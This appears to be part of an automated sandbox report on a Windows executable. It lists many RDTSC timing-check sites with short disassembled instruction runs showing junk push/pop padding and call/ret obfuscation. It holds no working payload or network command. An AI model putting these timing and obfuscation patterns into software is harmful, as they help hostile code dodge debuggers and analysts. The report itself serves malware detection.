                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF16CF second address: CF170A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F0C44EBA8F8h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F0C44EBA8EFh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F0C44EBA8E6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF1848 second address: CF1865 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF19D1 second address: CF19D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF19D5 second address: CF19E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F0C44DA3FE6h 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF19E5 second address: CF19EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF19EB second address: CF1A21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF0h 0x00000007 jmp 00007F0C44DA3FF8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F0C44DA3FEEh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF1B64 second address: CF1B6A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5081 second address: B71989 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44DA3FE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F0C44DA3FF1h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push esi 0x00000016 jmp 00007F0C44DA3FEDh 0x0000001b pop esi 0x0000001c pop eax 0x0000001d push ecx 0x0000001e mov dword ptr [ebp+122D3160h], edi 0x00000024 pop esi 0x00000025 push dword ptr [ebp+122D15BDh] 0x0000002b mov esi, dword ptr [ebp+122D3732h] 0x00000031 call dword ptr [ebp+122D19DAh] 0x00000037 pushad 0x00000038 mov dword ptr [ebp+122D18EDh], edx 0x0000003e xor eax, eax 0x00000040 jmp 00007F0C44DA3FF9h 0x00000045 ja 00007F0C44DA3FE7h 0x0000004b cmc 0x0000004c mov edx, dword ptr [esp+28h] 0x00000050 jns 00007F0C44DA3FECh 0x00000056 mov dword ptr [ebp+122D3676h], eax 0x0000005c mov dword ptr [ebp+122D18EDh], ecx 0x00000062 mov esi, 0000003Ch 0x00000067 mov dword ptr [ebp+122D18EDh], ebx 0x0000006d add esi, dword ptr [esp+24h] 0x00000071 clc 0x00000072 lodsw 0x00000074 or dword ptr [ebp+122D2AFAh], esi 0x0000007a jc 00007F0C44DA3FE7h 0x00000080 stc 0x00000081 add eax, dword ptr [esp+24h] 0x00000085 pushad 0x00000086 or ecx, dword ptr [ebp+122D353Eh] 0x0000008c movzx ecx, dx 0x0000008f popad 0x00000090 jmp 00007F0C44DA3FF7h 0x00000095 mov ebx, dword ptr [esp+24h] 0x00000099 stc 0x0000009a nop 0x0000009b push eax 0x0000009c push edx 0x0000009d push edx 0x0000009e push eax 0x0000009f push edx 0x000000a0 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF50EC second address: CF5139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0C44EBA8EAh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F0C44EBA8EEh 0x00000015 popad 0x00000016 push ebx 0x00000017 jmp 00007F0C44EBA8F0h 0x0000001c pop ebx 0x0000001d popad 0x0000001e nop 0x0000001f mov cl, dl 0x00000021 push 00000000h 0x00000023 mov cx, di 0x00000026 push 15993280h 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e jl 00007F0C44EBA8E6h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5139 second address: CF5151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5151 second address: CF5157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5157 second address: CF51B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 15993200h 0x0000000d jmp 00007F0C44DA3FEBh 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F0C44DA3FE8h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D3160h], ebx 0x00000036 push 00000003h 0x00000038 mov si, di 0x0000003b call 00007F0C44DA3FE9h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 push eax 0x00000044 pop eax 0x00000045 push eax 0x00000046 pop eax 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF51B1 second address: CF51B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF51B7 second address: CF51BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF51BB second address: CF51CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F0C44EBA8E6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF51CE second address: CF51D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF51D4 second address: CF51F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0C44EBA8E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007F0C44EBA8ECh 0x00000018 jbe 00007F0C44EBA8E6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF51F2 second address: CF51F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF51F8 second address: CF51FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF52C1 second address: CF52C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF52C5 second address: CF52F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0C44EBA8F8h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF52F9 second address: CF5314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 nop 0x00000007 xor edi, 13AAF683h 0x0000000d push 00000000h 0x0000000f clc 0x00000010 push 00AE2FA6h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop eax 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5314 second address: CF539A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 00AE2F26h 0x0000000f mov dword ptr [ebp+122D1BC7h], edx 0x00000015 push 00000003h 0x00000017 push 00000000h 0x00000019 sbb cl, FFFFFFACh 0x0000001c push 00000003h 0x0000001e pushad 0x0000001f sbb si, 2800h 0x00000024 mov ecx, dword ptr [ebp+122D371Ah] 0x0000002a popad 0x0000002b mov edx, dword ptr [ebp+122D3536h] 0x00000031 push 473CB6DDh 0x00000036 jng 00007F0C44EBA8F0h 0x0000003c pushad 0x0000003d jc 00007F0C44EBA8E6h 0x00000043 push edx 0x00000044 pop edx 0x00000045 popad 0x00000046 add dword ptr [esp], 78C34923h 0x0000004d jbe 00007F0C44EBA8EAh 0x00000053 mov si, CDD2h 0x00000057 lea ebx, dword ptr [ebp+12456F68h] 0x0000005d pushad 0x0000005e pushad 0x0000005f mov edx, dword ptr [ebp+122D19CEh] 0x00000065 adc edx, 10D8EDDFh 0x0000006b popad 0x0000006c mov dword ptr [ebp+122D19BBh], eax 0x00000072 popad 0x00000073 xchg eax, ebx 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F0C44EBA8F0h 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF539A second address: CF53A4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0C44DA3FECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF53A4 second address: CF53B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF53B0 second address: CF53B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D14D6F second address: D14D73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D14D73 second address: D14D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15490 second address: D154A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0C44EBA8EEh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D155F8 second address: D1560C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FF0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1560C second address: D15612 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D157B6 second address: D157D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0C44DA3FEEh 0x0000000b jc 00007F0C44DA3FEEh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15A75 second address: D15A7A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16397 second address: D163A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0C44DA3FE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19A68 second address: D19A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F0C44EBA8EEh 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0C44EBA8F9h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2DF second address: D1D2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0C44DA3FE6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2EE second address: D1D300 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44EBA8E6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D300 second address: D1D30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FEBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D30F second address: D1D31E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0C44EBA8E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D232AF second address: D232BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F0C44DA3FE6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D232BC second address: D232C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D232C0 second address: D232CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D232CC second address: D232D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0C44EBA8E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD93A second address: CDD940 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2290D second address: D22913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22913 second address: D22918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22918 second address: D22924 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0C44EBA8EEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22FA9 second address: D22FC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22FC0 second address: D22FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25FDA second address: D25FEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25FEF second address: D26008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44EBA8F5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26008 second address: D2600C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2600C second address: D2601B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2601B second address: D26046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F0C44DA3FE6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 jmp 00007F0C44DA3FF5h 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26C41 second address: D26C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26C48 second address: D26C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26C4E second address: D26C5D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26E11 second address: D26E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26E16 second address: D26E3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0C44EBA8F4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26EC3 second address: D26ECD instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C44DA3FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AA40 second address: D2AA46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AA46 second address: D2AA57 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C44DA3FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C4F2 second address: D2C515 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0C44EBA8EAh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0C44EBA8F5h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CB17 second address: D2CB4F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F0C44DA3FE6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D1F91h] 0x00000017 push 00000000h 0x00000019 jno 00007F0C44DA3FECh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007F0C44DA3FECh 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D537 second address: D2D53B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D53B second address: D2D5A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a or dword ptr [ebp+124718D3h], edx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F0C44DA3FE8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F0C44DA3FE8h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 xchg eax, ebx 0x00000049 je 00007F0C44DA3FF4h 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D5A3 second address: D2D5A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2DF23 second address: D2DF27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2DF27 second address: D2DF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E7CC second address: D2E7D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F4BA second address: D2F4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F235 second address: D2F23F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0C44DA3FECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F4BE second address: D2F4C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F23F second address: D2F254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F0C44DA3FECh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31CE3 second address: D31CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32263 second address: D32267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3341A second address: D3341E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D323C4 second address: D323C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36596 second address: D365A0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0C44EBA8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D365A0 second address: D365B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44DA3FECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36694 second address: D36698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39621 second address: D39626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38759 second address: D3877B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007F0C44EBA8ECh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0C44EBA8ECh 0x00000015 rdtsc
